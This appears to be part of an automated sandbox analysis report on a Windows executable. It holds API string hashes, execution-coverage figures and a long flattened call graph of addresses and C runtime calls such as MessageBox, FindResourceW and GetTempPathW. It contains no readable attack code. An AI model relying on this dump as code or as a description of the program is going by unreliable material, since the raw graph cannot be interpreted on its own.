                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000522F7
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: b04df89e7ed5df788b89fe380f44343aa86461c4a8ffa33747f3d789aefd4e84
                                                            • Instruction ID: 7ede6970ce9771864aba55df4b7520888805e36c1bc456e2fd2ec0cf4c614645
                                                            • Opcode Fuzzy Hash: b04df89e7ed5df788b89fe380f44343aa86461c4a8ffa33747f3d789aefd4e84
                                                            • Instruction Fuzzy Hash: 4CD02B7190853036D60137286C09DAF38156F12730F210714F73D691F6CBBC099182D9
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,0004ED55,?), ref: 0004F5A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004ED55,?), ref: 0004F5B1
                                                            Strings
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
                                                            • Instruction ID: db33f712b1776be1dabc98ae9f917cd820b027d3236f8123634c02a535b62c45
                                                            • Opcode Fuzzy Hash: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
                                                            • Instruction Fuzzy Hash: 06C01272A4475066E63027B16C0DB832E9C5B00711F050458B709EA1C0D7FDD88086E4

                                                            Execution Graph

                                                            Execution Coverage:11.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:36
15595->15418 15597 7ff6dd6529e0 55 API calls 15596->15597 15598 7ff6dd658b75 15597->15598 15598->15418 15600 7ff6dd656df5 15599->15600 15601 7ff6dd653bf4 15600->15601 15602 7ff6dd652890 59 API calls 15600->15602 15601->15427 15696 7ff6dd656a90 15601->15696 15602->15601 15604 7ff6dd653574 15603->15604 15608 7ff6dd653533 15603->15608 15605 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15604->15605 15606 7ff6dd6535c5 15605->15606 15606->15433 15610 7ff6dd657fd0 15606->15610 15608->15604 16862 7ff6dd651710 15608->16862 16904 7ff6dd652d70 15608->16904 15611 7ff6dd658ae0 57 API calls 15610->15611 15612 7ff6dd657fef 15611->15612 15613 7ff6dd658ae0 57 API calls 15612->15613 15614 7ff6dd657fff 15613->15614 15615 7ff6dd667dec 38 API calls 15614->15615 15616 7ff6dd65800d __vcrt_freefls 15615->15616 15616->15448 15618 7ff6dd658090 15617->15618 15619 7ff6dd658ae0 57 API calls 15618->15619 15661 7ff6dd652b50 15660->15661 15662 7ff6dd664ac4 49 API calls 15661->15662 15663 7ff6dd652b9b memcpy_s 15662->15663 15664 7ff6dd658ae0 57 API calls 15663->15664 15665 7ff6dd652bd0 15664->15665 15666 7ff6dd652c0d MessageBoxA 15665->15666 15667 7ff6dd652bd5 15665->15667 15669 7ff6dd652c27 15666->15669 15668 7ff6dd658ae0 57 API calls 15667->15668 15671 7ff6dd652bef MessageBoxW 15668->15671 15670 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15669->15670 15672 7ff6dd652c37 15670->15672 15671->15669 15672->15433 15674 7ff6dd653fdc 15673->15674 15675 7ff6dd658ae0 57 API calls 15674->15675 15676 7ff6dd654007 15675->15676 15677 7ff6dd658ae0 57 API calls 15676->15677 15678 7ff6dd65401a 15677->15678 17456 7ff6dd6664a8 15678->17456 15681 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15682 7ff6dd653b0e 15681->15682 15682->15426 15683 7ff6dd6582b0 15682->15683 15684 7ff6dd6582d4 15683->15684 15685 7ff6dd660814 73 API calls 15684->15685 15688 7ff6dd6583ab __vcrt_freefls 15684->15688 15686 7ff6dd6582ee 15685->15686 15686->15688 17835 7ff6dd669070 15686->17835 15688->15432 15693 7ff6dd6601bc 15692->15693 15697 
7ff6dd656aca 15696->15697 15698 7ff6dd656ab3 15696->15698 15697->15428 15698->15697 17861 7ff6dd6515a0 15698->17861 15700 7ff6dd656ad4 15700->15697 15701 7ff6dd654050 49 API calls 15700->15701 15702 7ff6dd656b35 15701->15702 15703 7ff6dd652b30 59 API calls 15702->15703 15704 7ff6dd656ba5 memcpy_s __vcrt_freefls 15702->15704 15703->15697 15704->15428 15711 7ff6dd65660a memcpy_s 15705->15711 15706 7ff6dd65672f 15708 7ff6dd654050 49 API calls 15706->15708 15710 7ff6dd6567a8 15708->15710 15709 7ff6dd65674b 15712 7ff6dd652b30 59 API calls 15709->15712 15715 7ff6dd654050 49 API calls 15710->15715 15711->15706 15711->15709 15713 7ff6dd654050 49 API calls 15711->15713 15714 7ff6dd656710 15711->15714 15721 7ff6dd651710 144 API calls 15711->15721 15723 7ff6dd656731 15711->15723 17885 7ff6dd651950 15711->17885 15722 7ff6dd656741 __vcrt_freefls 15712->15722 15713->15711 15714->15706 15716 7ff6dd654050 49 API calls 15714->15716 15717 7ff6dd6567d8 15715->15717 15716->15706 15720 7ff6dd654050 49 API calls 15717->15720 15718 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15719 7ff6dd653c1a 15718->15719 15719->15441 15725 7ff6dd656570 15719->15725 15720->15722 15721->15711 15722->15718 15724 7ff6dd652b30 59 API calls 15723->15724 15724->15722 17889 7ff6dd658260 15725->17889 15727 7ff6dd65658c 15728 7ff6dd658260 58 API calls 15727->15728 15729 7ff6dd65659f 15728->15729 15742 7ff6dd651f15 15741->15742 15743 7ff6dd664ac4 49 API calls 15742->15743 15744 7ff6dd651f38 15743->15744 15744->15446 17952 7ff6dd655bc0 15745->17952 15748 7ff6dd6534ad 15748->15453 15798 7ff6dd65bc60 15779->15798 15782 7ff6dd652a29 15800 7ff6dd664ac4 15782->15800 15787 7ff6dd651ef0 49 API calls 15788 7ff6dd652a86 memcpy_s 15787->15788 15789 7ff6dd658ae0 54 API calls 15788->15789 15790 7ff6dd652abb 15789->15790 15791 7ff6dd652af8 MessageBoxA 15790->15791 15792 7ff6dd652ac0 15790->15792 15794 7ff6dd652b12 15791->15794 15793 7ff6dd658ae0 54 API calls 15792->15793 15795 7ff6dd652ada MessageBoxW 15793->15795 15796 
7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15794->15796 15795->15794 15797 7ff6dd652b22 15796->15797 15797->15516 15799 7ff6dd6529fc GetLastError 15798->15799 15799->15782 15803 7ff6dd664b1e 15800->15803 15801 7ff6dd664b43 15802 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15801->15802 15817 7ff6dd664b6d 15802->15817 15803->15801 15804 7ff6dd664b7f 15803->15804 15830 7ff6dd662d50 15804->15830 15806 7ff6dd664c5c 15809 7ff6dd66af0c __free_lconv_num 11 API calls 15806->15809 15808 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15810 7ff6dd652a57 15808->15810 15809->15817 15818 7ff6dd658560 15810->15818 15811 7ff6dd664c31 15814 7ff6dd66af0c __free_lconv_num 11 API calls 15811->15814 15812 7ff6dd664c80 15812->15806 15813 7ff6dd664c8a 15812->15813 15816 7ff6dd66af0c __free_lconv_num 11 API calls 15813->15816 15814->15817 15815 7ff6dd664c28 15815->15806 15815->15811 15816->15817 15817->15808 15819 7ff6dd65856c 15818->15819 15820 7ff6dd65858d FormatMessageW 15819->15820 15821 7ff6dd658587 GetLastError 15819->15821 15822 7ff6dd6585dc WideCharToMultiByte 15820->15822 15823 7ff6dd6585c0 15820->15823 15821->15820 15825 7ff6dd658616 15822->15825 15826 7ff6dd6585d3 15822->15826 15824 7ff6dd6529e0 54 API calls 15823->15824 15824->15826 15827 7ff6dd6529e0 54 API calls 15825->15827 15828 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15826->15828 15827->15826 15829 7ff6dd652a5e 15828->15829 15829->15787 15831 7ff6dd662d8e 15830->15831 15832 7ff6dd662d7e 15830->15832 15833 7ff6dd662d97 15831->15833 15840 7ff6dd662dc5 15831->15840 15836 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15832->15836 15834 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15833->15834 15835 7ff6dd662dbd 15834->15835 15835->15806 15835->15811 15835->15812 15835->15815 15836->15835 15839 7ff6dd663074 15842 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15839->15842 15840->15832 15840->15835 15840->15839 15844 7ff6dd6636e0 15840->15844 15870 7ff6dd6633a8 15840->15870 15900 7ff6dd662c30 15840->15900 
15903 7ff6dd664900 15840->15903 15842->15832 15845 7ff6dd663722 15844->15845 15846 7ff6dd663795 15844->15846 15847 7ff6dd663728 15845->15847 15848 7ff6dd6637bf 15845->15848 15849 7ff6dd66379a 15846->15849 15850 7ff6dd6637ef 15846->15850 15856 7ff6dd66372d 15847->15856 15859 7ff6dd6637fe 15847->15859 15927 7ff6dd661c90 15848->15927 15851 7ff6dd66379c 15849->15851 15852 7ff6dd6637cf 15849->15852 15850->15848 15850->15859 15868 7ff6dd663758 15850->15868 15853 7ff6dd66373d 15851->15853 15858 7ff6dd6637ab 15851->15858 15934 7ff6dd661880 15852->15934 15869 7ff6dd66382d 15853->15869 15909 7ff6dd664044 15853->15909 15856->15853 15860 7ff6dd663770 15856->15860 15856->15868 15858->15848 15862 7ff6dd6637b0 15858->15862 15859->15869 15941 7ff6dd6620a0 15859->15941 15860->15869 15919 7ff6dd664500 15860->15919 15862->15869 15923 7ff6dd664698 15862->15923 15864 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15866 7ff6dd663ac3 15864->15866 15866->15840 15868->15869 15948 7ff6dd66ee18 15868->15948 15869->15864 15871 7ff6dd6633c9 15870->15871 15872 7ff6dd6633b3 15870->15872 15873 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15871->15873 15876 7ff6dd663407 15871->15876 15874 7ff6dd663722 15872->15874 15875 7ff6dd663795 15872->15875 15872->15876 15873->15876 15877 7ff6dd663728 15874->15877 15878 7ff6dd6637bf 15874->15878 15879 7ff6dd66379a 15875->15879 15880 7ff6dd6637ef 15875->15880 15876->15840 15887 7ff6dd66372d 15877->15887 15890 7ff6dd6637fe 15877->15890 15884 7ff6dd661c90 38 API calls 15878->15884 15881 7ff6dd66379c 15879->15881 15882 7ff6dd6637cf 15879->15882 15880->15878 15880->15890 15895 7ff6dd663758 15880->15895 15883 7ff6dd66373d 15881->15883 15888 7ff6dd6637ab 15881->15888 15885 7ff6dd661880 38 API calls 15882->15885 15886 7ff6dd664044 47 API calls 15883->15886 15899 7ff6dd66382d 15883->15899 15884->15895 15885->15895 15886->15895 15887->15883 15889 7ff6dd663770 15887->15889 15887->15895 15888->15878 15892 7ff6dd6637b0 15888->15892 15893 7ff6dd664500 47 API calls 
15889->15893 15889->15899 15891 7ff6dd6620a0 38 API calls 15890->15891 15890->15899 15891->15895 15896 7ff6dd664698 37 API calls 15892->15896 15892->15899 15893->15895 15894 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 15897 7ff6dd663ac3 15894->15897 15898 7ff6dd66ee18 47 API calls 15895->15898 15895->15899 15896->15895 15897->15840 15898->15895 15899->15894 16104 7ff6dd660e54 15900->16104 15904 7ff6dd664917 15903->15904 16121 7ff6dd66df78 15904->16121 15910 7ff6dd664066 15909->15910 15958 7ff6dd660cc0 15910->15958 15915 7ff6dd6641a3 15917 7ff6dd664900 45 API calls 15915->15917 15918 7ff6dd66422c 15915->15918 15916 7ff6dd664900 45 API calls 15916->15915 15917->15918 15918->15868 15920 7ff6dd664518 15919->15920 15922 7ff6dd664580 15919->15922 15921 7ff6dd66ee18 47 API calls 15920->15921 15920->15922 15921->15922 15922->15868 15926 7ff6dd6646b9 15923->15926 15924 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15925 7ff6dd6646ea 15924->15925 15925->15868 15926->15924 15926->15925 15928 7ff6dd661cc3 15927->15928 15929 7ff6dd661cf2 15928->15929 15931 7ff6dd661daf 15928->15931 15930 7ff6dd660cc0 12 API calls 15929->15930 15933 7ff6dd661d2f 15929->15933 15930->15933 15932 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15931->15932 15932->15933 15933->15868 15935 7ff6dd6618b3 15934->15935 15936 7ff6dd6618e2 15935->15936 15938 7ff6dd66199f 15935->15938 15937 7ff6dd660cc0 12 API calls 15936->15937 15940 7ff6dd66191f 15936->15940 15937->15940 15939 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15938->15939 15939->15940 15940->15868 15942 7ff6dd6620d3 15941->15942 15943 7ff6dd662102 15942->15943 15945 7ff6dd6621bf 15942->15945 15944 7ff6dd660cc0 12 API calls 15943->15944 15947 7ff6dd66213f 15943->15947 15944->15947 15946 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15945->15946 15946->15947 15947->15868 15949 7ff6dd66ee40 15948->15949 15950 7ff6dd66ee85 15949->15950 15951 7ff6dd664900 45 API calls 15949->15951 15952 7ff6dd66ee45 memcpy_s 15949->15952 15954 
7ff6dd66ee6e memcpy_s 15949->15954 15950->15952 15950->15954 16101 7ff6dd6704c8 15950->16101 15951->15950 15952->15868 15953 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15953->15952 15954->15952 15954->15953 15959 7ff6dd660cf7 15958->15959 15965 7ff6dd660ce6 15958->15965 15959->15965 15988 7ff6dd66dbbc 15959->15988 15962 7ff6dd660d38 15963 7ff6dd66af0c __free_lconv_num 11 API calls 15962->15963 15963->15965 15964 7ff6dd66af0c __free_lconv_num 11 API calls 15964->15962 15966 7ff6dd66eb30 15965->15966 15967 7ff6dd66eb4d 15966->15967 15968 7ff6dd66eb80 15966->15968 15969 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 15967->15969 15968->15967 15971 7ff6dd66ebb2 15968->15971 15970 7ff6dd664181 15969->15970 15970->15915 15970->15916 15977 7ff6dd66ecc5 15971->15977 15981 7ff6dd66ebfa 15971->15981 15972 7ff6dd66edb7 16028 7ff6dd66e01c 15972->16028 15974 7ff6dd66ed7d 16021 7ff6dd66e3b4 15974->16021 15976 7ff6dd66ed4c 16014 7ff6dd66e694 15976->16014 15977->15972 15977->15974 15977->15976 15979 7ff6dd66ed0f 15977->15979 15980 7ff6dd66ed05 15977->15980 16004 7ff6dd66e8c4 15979->16004 15980->15974 15983 7ff6dd66ed0a 15980->15983 15981->15970 15995 7ff6dd66aa3c 15981->15995 15983->15976 15983->15979 15986 7ff6dd66aec4 _wfindfirst32i64 17 API calls 15987 7ff6dd66ee14 15986->15987 15989 7ff6dd66dc07 15988->15989 15993 7ff6dd66dbcb _findclose 15988->15993 15990 7ff6dd6654c4 _findclose 11 API calls 15989->15990 15992 7ff6dd660d24 15990->15992 15991 7ff6dd66dbee RtlAllocateHeap 15991->15992 15991->15993 15992->15962 15992->15964 15993->15989 15993->15991 15994 7ff6dd673c00 _findclose 2 API calls 15993->15994 15994->15993 15996 7ff6dd66aa49 15995->15996 15997 7ff6dd66aa53 15995->15997 15996->15997 16002 7ff6dd66aa6e 15996->16002 15998 7ff6dd6654c4 _findclose 11 API calls 15997->15998 15999 7ff6dd66aa5a 15998->15999 16000 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 15999->16000 16001 7ff6dd66aa66 16000->16001 16001->15970 16001->15986 16002->16001 16003 
7ff6dd6654c4 _findclose 11 API calls 16002->16003 16003->15999 16037 7ff6dd67471c 16004->16037 16008 7ff6dd66e96c 16009 7ff6dd66e970 16008->16009 16010 7ff6dd66e9c1 16008->16010 16011 7ff6dd66e98c 16008->16011 16009->15970 16090 7ff6dd66e4b0 16010->16090 16086 7ff6dd66e76c 16011->16086 16015 7ff6dd67471c 38 API calls 16014->16015 16016 7ff6dd66e6de 16015->16016 16017 7ff6dd674164 37 API calls 16016->16017 16018 7ff6dd66e72e 16017->16018 16019 7ff6dd66e732 16018->16019 16020 7ff6dd66e76c 45 API calls 16018->16020 16019->15970 16020->16019 16022 7ff6dd67471c 38 API calls 16021->16022 16023 7ff6dd66e3ff 16022->16023 16024 7ff6dd674164 37 API calls 16023->16024 16025 7ff6dd66e457 16024->16025 16026 7ff6dd66e45b 16025->16026 16027 7ff6dd66e4b0 45 API calls 16025->16027 16026->15970 16027->16026 16029 7ff6dd66e094 16028->16029 16030 7ff6dd66e061 16028->16030 16032 7ff6dd66e0ac 16029->16032 16035 7ff6dd66e12d 16029->16035 16031 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16030->16031 16034 7ff6dd66e08d memcpy_s 16031->16034 16033 7ff6dd66e3b4 46 API calls 16032->16033 16033->16034 16034->15970 16035->16034 16036 7ff6dd664900 45 API calls 16035->16036 16036->16034 16038 7ff6dd67476f fegetenv 16037->16038 16039 7ff6dd67867c 37 API calls 16038->16039 16043 7ff6dd6747c2 16039->16043 16040 7ff6dd6747ef 16045 7ff6dd66aa3c __std_exception_copy 37 API calls 16040->16045 16041 7ff6dd6748b2 16042 7ff6dd67867c 37 API calls 16041->16042 16044 7ff6dd6748dc 16042->16044 16043->16041 16046 7ff6dd67488c 16043->16046 16047 7ff6dd6747dd 16043->16047 16048 7ff6dd67867c 37 API calls 16044->16048 16049 7ff6dd67486d 16045->16049 16052 7ff6dd66aa3c __std_exception_copy 37 API calls 16046->16052 16047->16040 16047->16041 16050 7ff6dd6748ed 16048->16050 16051 7ff6dd675994 16049->16051 16056 7ff6dd674875 16049->16056 16053 7ff6dd678870 20 API calls 16050->16053 16054 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16051->16054 16052->16049 16064 7ff6dd674956 memcpy_s 16053->16064 16055 
7ff6dd6759a9 16054->16055 16057 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16056->16057 16058 7ff6dd66e911 16057->16058 16082 7ff6dd674164 16058->16082 16059 7ff6dd674cff memcpy_s 16060 7ff6dd67503f 16061 7ff6dd674280 37 API calls 16060->16061 16068 7ff6dd675757 16061->16068 16062 7ff6dd674feb 16062->16060 16065 7ff6dd6759ac memcpy_s 37 API calls 16062->16065 16063 7ff6dd674997 memcpy_s 16076 7ff6dd6752db memcpy_s 16063->16076 16078 7ff6dd674df3 memcpy_s 16063->16078 16064->16059 16064->16063 16066 7ff6dd6654c4 _findclose 11 API calls 16064->16066 16065->16060 16067 7ff6dd674dd0 16066->16067 16069 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16067->16069 16070 7ff6dd6759ac memcpy_s 37 API calls 16068->16070 16080 7ff6dd6757b2 16068->16080 16069->16063 16070->16080 16071 7ff6dd675938 16072 7ff6dd67867c 37 API calls 16071->16072 16072->16056 16073 7ff6dd6654c4 11 API calls _findclose 16073->16076 16074 7ff6dd6654c4 11 API calls _findclose 16074->16078 16075 7ff6dd66aea4 37 API calls _invalid_parameter_noinfo 16075->16078 16076->16060 16076->16062 16076->16073 16081 7ff6dd66aea4 37 API calls _invalid_parameter_noinfo 16076->16081 16077 7ff6dd674280 37 API calls 16077->16080 16078->16062 16078->16074 16078->16075 16079 7ff6dd6759ac memcpy_s 37 API calls 16079->16080 16080->16071 16080->16077 16080->16079 16081->16076 16083 7ff6dd674183 16082->16083 16084 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16083->16084 16085 7ff6dd6741ae memcpy_s 16083->16085 16084->16085 16085->16008 16087 7ff6dd66e798 memcpy_s 16086->16087 16088 7ff6dd664900 45 API calls 16087->16088 16089 7ff6dd66e852 memcpy_s 16087->16089 16088->16089 16089->16009 16091 7ff6dd66e4eb 16090->16091 16092 7ff6dd66e538 memcpy_s 16090->16092 16093 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16091->16093 16095 7ff6dd66e5a3 16092->16095 16097 7ff6dd664900 45 API calls 16092->16097 16094 7ff6dd66e517 16093->16094 16094->16009 16096 7ff6dd66aa3c __std_exception_copy 37 API calls 16095->16096 
16100 7ff6dd66e5e5 memcpy_s 16096->16100 16097->16095 16098 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16099 7ff6dd66e690 16098->16099 16100->16098 16103 7ff6dd6704ec WideCharToMultiByte 16101->16103 16105 7ff6dd660e93 16104->16105 16106 7ff6dd660e81 16104->16106 16108 7ff6dd660ea0 16105->16108 16112 7ff6dd660edd 16105->16112 16107 7ff6dd6654c4 _findclose 11 API calls 16106->16107 16109 7ff6dd660e86 16107->16109 16111 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16108->16111 16110 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16109->16110 16116 7ff6dd660e91 16110->16116 16111->16116 16113 7ff6dd660f86 16112->16113 16114 7ff6dd6654c4 _findclose 11 API calls 16112->16114 16115 7ff6dd6654c4 _findclose 11 API calls 16113->16115 16113->16116 16117 7ff6dd660f7b 16114->16117 16118 7ff6dd661030 16115->16118 16116->15840 16119 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16117->16119 16120 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16118->16120 16119->16113 16120->16116 16122 7ff6dd66df91 16121->16122 16124 7ff6dd66493f 16121->16124 16122->16124 16129 7ff6dd673974 16122->16129 16125 7ff6dd66dfe4 16124->16125 16126 7ff6dd66494f 16125->16126 16127 7ff6dd66dffd 16125->16127 16126->15840 16127->16126 16173 7ff6dd672cc0 16127->16173 16141 7ff6dd66b710 GetLastError 16129->16141 16132 7ff6dd6739ce 16132->16124 16142 7ff6dd66b734 FlsGetValue 16141->16142 16143 7ff6dd66b751 FlsSetValue 16141->16143 16144 7ff6dd66b74b 16142->16144 16160 7ff6dd66b741 16142->16160 16145 7ff6dd66b763 16143->16145 16143->16160 16144->16143 16147 7ff6dd66f158 _findclose 11 API calls 16145->16147 16146 7ff6dd66b7bd SetLastError 16148 7ff6dd66b7dd 16146->16148 16149 7ff6dd66b7ca 16146->16149 16150 7ff6dd66b772 16147->16150 16164 7ff6dd66aa9c 16148->16164 16149->16132 16163 7ff6dd670cb8 EnterCriticalSection 16149->16163 16152 7ff6dd66b790 FlsSetValue 16150->16152 16153 7ff6dd66b780 FlsSetValue 16150->16153 16155 7ff6dd66b79c FlsSetValue 16152->16155 16156 7ff6dd66b7ae 
16152->16156 16154 7ff6dd66b789 16153->16154 16158 7ff6dd66af0c __free_lconv_num 11 API calls 16154->16158 16155->16154 16159 7ff6dd66b4b8 _findclose 11 API calls 16156->16159 16158->16160 16161 7ff6dd66b7b6 16159->16161 16160->16146 16162 7ff6dd66af0c __free_lconv_num 11 API calls 16161->16162 16162->16146 16165 7ff6dd673cc0 __CxxCallCatchBlock EnterCriticalSection LeaveCriticalSection 16164->16165 16166 7ff6dd66aaa5 16165->16166 16167 7ff6dd66aab4 16166->16167 16168 7ff6dd673d10 __CxxCallCatchBlock 44 API calls 16166->16168 16169 7ff6dd66aabd IsProcessorFeaturePresent 16167->16169 16170 7ff6dd66aae7 __CxxCallCatchBlock 16167->16170 16168->16167 16171 7ff6dd66aacc 16169->16171 16172 7ff6dd66abd8 _wfindfirst32i64 14 API calls 16171->16172 16172->16170 16174 7ff6dd66b710 __CxxCallCatchBlock 45 API calls 16173->16174 16175 7ff6dd672cc9 16174->16175 16183 7ff6dd66536c EnterCriticalSection 16176->16183 16185 7ff6dd6528ac 16184->16185 16186 7ff6dd664ac4 49 API calls 16185->16186 16187 7ff6dd6528fd 16186->16187 16188 7ff6dd6654c4 _findclose 11 API calls 16187->16188 16189 7ff6dd652902 16188->16189 16203 7ff6dd6654e4 16189->16203 16192 7ff6dd651ef0 49 API calls 16193 7ff6dd652931 memcpy_s 16192->16193 16194 7ff6dd658ae0 57 API calls 16193->16194 16195 7ff6dd652966 16194->16195 16196 7ff6dd65296b 16195->16196 16197 7ff6dd6529a3 MessageBoxA 16195->16197 16198 7ff6dd658ae0 57 API calls 16196->16198 16199 7ff6dd6529bd 16197->16199 16200 7ff6dd652985 MessageBoxW 16198->16200 16201 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16199->16201 16200->16199 16202 7ff6dd6529cd 16201->16202 16202->15526 16204 7ff6dd66b888 _findclose 11 API calls 16203->16204 16205 7ff6dd6654fb 16204->16205 16206 7ff6dd66f158 _findclose 11 API calls 16205->16206 16208 7ff6dd66553b 16205->16208 16212 7ff6dd652909 16205->16212 16207 7ff6dd665530 16206->16207 16209 7ff6dd66af0c __free_lconv_num 11 API calls 16207->16209 16208->16212 16215 7ff6dd66f828 16208->16215 16209->16208 16212->16192 16213 7ff6dd66aec4 
_wfindfirst32i64 17 API calls 16214 7ff6dd665580 16213->16214 16216 7ff6dd66f845 16215->16216 16219 7ff6dd665561 16216->16219 16220 7ff6dd66f84a 16216->16220 16222 7ff6dd66f894 16216->16222 16217 7ff6dd6654c4 _findclose 11 API calls 16218 7ff6dd66f854 16217->16218 16221 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16218->16221 16219->16212 16219->16213 16220->16217 16220->16219 16221->16219 16222->16219 16223 7ff6dd6654c4 _findclose 11 API calls 16222->16223 16223->16218 16225 7ff6dd658c82 WideCharToMultiByte 16224->16225 16226 7ff6dd658c14 WideCharToMultiByte 16224->16226 16229 7ff6dd653f25 16225->16229 16230 7ff6dd658caf 16225->16230 16227 7ff6dd658c55 16226->16227 16228 7ff6dd658c3e 16226->16228 16227->16225 16233 7ff6dd658c6b 16227->16233 16231 7ff6dd6529e0 57 API calls 16228->16231 16229->15536 16229->15537 16232 7ff6dd6529e0 57 API calls 16230->16232 16231->16229 16232->16229 16234 7ff6dd6529e0 57 API calls 16233->16234 16234->16229 16236 7ff6dd66a9b3 16235->16236 16239 7ff6dd657bde 16235->16239 16237 7ff6dd66aa3c __std_exception_copy 37 API calls 16236->16237 16236->16239 16238 7ff6dd66a9e0 16237->16238 16238->16239 16240 7ff6dd66aec4 _wfindfirst32i64 17 API calls 16238->16240 16239->15553 16241 7ff6dd66aa10 16240->16241 16243 7ff6dd653fd0 116 API calls 16242->16243 16244 7ff6dd651ad6 16243->16244 16245 7ff6dd651c84 16244->16245 16247 7ff6dd6582b0 83 API calls 16244->16247 16246 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16245->16246 16248 7ff6dd651c98 16246->16248 16249 7ff6dd651b0e 16247->16249 16248->15572 16275 7ff6dd653e40 16248->16275 16274 7ff6dd651b3f 16249->16274 16281 7ff6dd660814 16249->16281 16251 7ff6dd66018c 74 API calls 16251->16245 16252 7ff6dd651b28 16253 7ff6dd651b2c 16252->16253 16254 7ff6dd651b44 16252->16254 16256 7ff6dd652890 59 API calls 16253->16256 16285 7ff6dd6604dc 16254->16285 16256->16274 16258 7ff6dd651b77 16261 7ff6dd660814 73 API calls 16258->16261 16259 7ff6dd651b5f 16260 7ff6dd652890 59 API calls 16259->16260 
16260->16274 16262 7ff6dd651bc4 16261->16262 16263 7ff6dd651bd6 16262->16263 16264 7ff6dd651bee 16262->16264 16265 7ff6dd652890 59 API calls 16263->16265 16266 7ff6dd6604dc _fread_nolock 53 API calls 16264->16266 16265->16274 16267 7ff6dd651c03 16266->16267 16268 7ff6dd651c09 16267->16268 16269 7ff6dd651c1e 16267->16269 16270 7ff6dd652890 59 API calls 16268->16270 16288 7ff6dd660250 16269->16288 16270->16274 16274->16251 16276 7ff6dd651ef0 49 API calls 16275->16276 16277 7ff6dd653e5d 16276->16277 16277->15573 16279 7ff6dd651ef0 49 API calls 16278->16279 16280 7ff6dd654080 16279->16280 16280->15572 16282 7ff6dd660844 16281->16282 16294 7ff6dd6605a4 16282->16294 16284 7ff6dd66085d 16284->16252 16306 7ff6dd6604fc 16285->16306 16295 7ff6dd66060e 16294->16295 16296 7ff6dd6605ce 16294->16296 16295->16296 16298 7ff6dd66061a 16295->16298 16297 7ff6dd66add8 _invalid_parameter_noinfo 37 API calls 16296->16297 16299 7ff6dd6605f5 16297->16299 16305 7ff6dd66536c EnterCriticalSection 16298->16305 16299->16284 16307 7ff6dd660526 16306->16307 16318 7ff6dd651b59 16306->16318 16308 7ff6dd660572 16307->16308 16309 7ff6dd660535 memcpy_s 16307->16309 16307->16318 16319 7ff6dd66536c EnterCriticalSection 16308->16319 16311 7ff6dd6654c4 _findclose 11 API calls 16309->16311 16313 7ff6dd66054a 16311->16313 16315 7ff6dd66aea4 _invalid_parameter_noinfo 37 API calls 16313->16315 16315->16318 16318->16258 16318->16259 16321 7ff6dd657966 16320->16321 16322 7ff6dd65798a 16321->16322 16323 7ff6dd6579dd GetTempPathW 16321->16323 16325 7ff6dd657b60 61 API calls 16322->16325 16324 7ff6dd6579f2 16323->16324 16359 7ff6dd652830 16324->16359 16326 7ff6dd657996 16325->16326 16383 7ff6dd657420 16326->16383 16332 7ff6dd65bcc0 _wfindfirst32i64 8 API calls 16334 7ff6dd65154f 16332->16334 16333 7ff6dd6579bc __vcrt_freefls 16333->16323 16334->15580 16334->15583 16336 7ff6dd657ab6 16339 7ff6dd658bf0 59 API calls 16336->16339 16337 7ff6dd657a0b __vcrt_freefls 16337->16336 16343 7ff6dd657a41 16337->16343 16363 
